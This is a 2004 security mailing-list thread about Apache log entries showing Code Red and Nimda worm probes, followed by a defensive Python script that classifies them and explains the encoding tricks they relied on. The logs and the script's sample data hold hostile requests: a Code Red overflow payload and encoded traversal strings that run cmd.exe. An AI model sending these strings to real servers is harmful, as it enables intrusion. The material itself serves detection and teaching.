[Dshield] Suspect HTTP-activity

Doug White doug at clickdoug.com
Fri Jan 23 21:35:32 GMT 2004


Looks like the signature of the CodeRed/Nimda worm/virus.

If you are running Win2k, make sure you have UrlScan installed, as well as all
patches/service packs.

======================================
Stop spam on your domain, Anti-spam solutions
http://www.clickdoug.com/mailfilter.cfm
For hosting solutions http://www.clickdoug.com
======================================
Aspire to Inspire before you Retire or Expire!


----- Original Message ----- 
From: "Martin Agren" <martin.agren at home.se>
To: <list at dshield.org>
Sent: Friday, January 23, 2004 12:30 PM
Subject: [Dshield] Suspect HTTP-activity


: Hello,
: I'm a fresh subscriber to this list and the very reason I stumbled upon
: it was that I was investigating some activity that apache logged and
: that made me a little suspicious about the intentions behind the
: requests. So first off, Hello!
:
: I've been trying to go through the most recent archives and while what
: you discuss seems to be both interesting and important, I haven't found
: anything that match my query.
:
: If this is the wrong place for my question, I can take pointers to other
: lists/sites for an answer. :-)
:
: Below are excerpts from my apache/access.log (I'm running Win2000Pro). I
: haven't publicly announced my web-server in any way -- I just use it for
: development of web-code and invite other developers to check it out.
:
: Most of these logs seem to indicate nothing actually happened
: (404-status), but I'm curious as to what it's all about and if anyone
: might be interested in this information. Any DShield-like service that
: collects apache-logs? ;-)
:
: Most of these requests seem to be someone wanting to list my disk.
:
: Are there any known worms that create these requests? Should I act in
: any way?
:
: Any help is much appreciated!
:
: If anyone wants me to post more logs, I can do so (it's basically just
: the same requests a couple of times)
:
: Martin
:
: 218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308
: 127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 404 320
: 210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET /scripts/nsiislog.dll" 404 -
: 202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 307
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 346
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 346
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 362
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
: 194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
:
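As an added illustration of the reply above (example code written for this page, not something either poster ran), the script below takes the request patterns from Martin's log, the Code Red "default.ida" overflow request and the Nimda root.exe / cmd.exe scan set, and tags each source IP with what it was probing for. It also shows why the traversal strings were written the way they were: a lenient decoder that percent-decodes twice and accepts overlong UTF-8 sequences turns `..%255c..`, `..%c1%1c..`, `..%c0%af..` and even `..%%35%63..` into a plain `../..`. That decoder is a teaching model of the IIS behaviour these worms relied on, not IIS's actual code. The log lines are copied from the post (the Code Red payload shortened to a few of its `%u` words); the final `10.0.0.5` line is a constructed benign request added for contrast.

```python
"""Classify the IIS-worm probe signatures seen in Apache access-log lines."""
import re
from collections import Counter, defaultdict

# Sample input: lines from the post above (Code Red payload shortened) plus one
# constructed benign request (10.0.0.5) for contrast.
SAMPLE_LOG = r'''
218.11.129.221 - - [20/Jan/2004:11:22:29 +0100] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308
127.0.0.1 - - [20/Jan/2004:12:56:23 +0100] "GET /default.ida HTTP/1.1" 404 320
210.161.69.133 - - [22/Jan/2004:08:44:28 +0100] "GET /scripts/nsiislog.dll" 404 -
202.71.136.211 - - [22/Jan/2004:15:12:52 +0100] "SEARCH / HTTP/1.1" 200 1916
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 307
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 305
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
194.47.216.32 - - [22/Jan/2004:17:17:34 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 312
10.0.0.5 - - [22/Jan/2004:18:00:00 +0100] "GET /index.html HTTP/1.1" 200 1234
'''

# Apache common/combined log prefix. The protocol is optional because the
# nsiislog.dll probe above was logged without one.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/\d\.\d))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

_PCT = re.compile(rb'%([0-9A-Fa-f]{2})')


def percent_decode_lenient(raw: bytes) -> bytes:
    """Decode %XX; a '%' not followed by two hex digits is left alone.
    Applied twice, %255c -> %5c -> '\\' and %%35%63 -> %5c -> '\\'."""
    return _PCT.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def decode_overlong(b: bytes) -> str:
    """Model of a UTF-8 decoder that accepts the overlong lead bytes 0xC0/0xC1
    and never checks that the second byte is a continuation byte. This is the
    bug the worm's %c0%af ('/'), %c1%9c and %c1%1c ('\\') strings exploit; a
    strict decoder rejects all of them."""
    out, i = [], 0
    while i < len(b):
        c = b[i]
        if 0xC0 <= c <= 0xDF and i + 1 < len(b):
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(c))
            i += 1
    return ''.join(out)


def canonicalize(path: str) -> str:
    """Reduce an encoded path to what the lenient server would have opened."""
    raw = percent_decode_lenient(percent_decode_lenient(path.encode('latin-1')))
    return decode_overlong(raw).replace('\\', '/')


def classify(method: str, target: str) -> str:
    """Label one request with the probe family it matches."""
    path, _, query = target.partition('?')
    lpath = path.lower()
    if lpath.endswith('/default.ida'):
        # Code Red: .ida ISAPI overflow; the X's pad the buffer, the %uXXXX
        # words are the payload. A bare /default.ida is just a probe.
        return 'codered' if re.search(r'%u[0-9a-f]{4}', query, re.I) else 'ida-probe'
    canon = canonicalize(path)
    if re.search(r'/(root|cmd)\.exe$', canon, re.I):
        # Nimda scan set: root.exe (Code Red II backdoor) or cmd.exe reached
        # through encoded traversal, with "/c+dir" as the command.
        return 'nimda'
    if lpath.endswith('/nsiislog.dll'):
        return 'nsiislog-probe'      # Windows Media Services ISAPI logging DLL
    if method.upper() == 'SEARCH':
        return 'webdav-search'       # WebDAV SEARCH against an IIS default site
    if '/../' in canon:
        return 'traversal'
    return 'benign'


def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text: str) -> dict:
    """Return {source_ip: Counter(label -> hits)} for the whole log."""
    per_ip = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line.strip())
        if rec:
            per_ip[rec['ip']][classify(rec['method'], rec['target'])] += 1
    return per_ip


if __name__ == '__main__':
    for ip, labels in analyze(SAMPLE_LOG).items():
        print(ip, dict(labels))
```

All of these hit IIS-only paths, which is why Apache answered 404 (and 400 for the malformed `%%35%63` variants); the canonicalizer is still useful on Apache as a way to flag traversal attempts whatever encoding the scanner chose. On a Win2k box that does run IIS, UrlScan's default rules reject requests of this shape before they reach an ISAPI extension, which is the point of the advice in the reply.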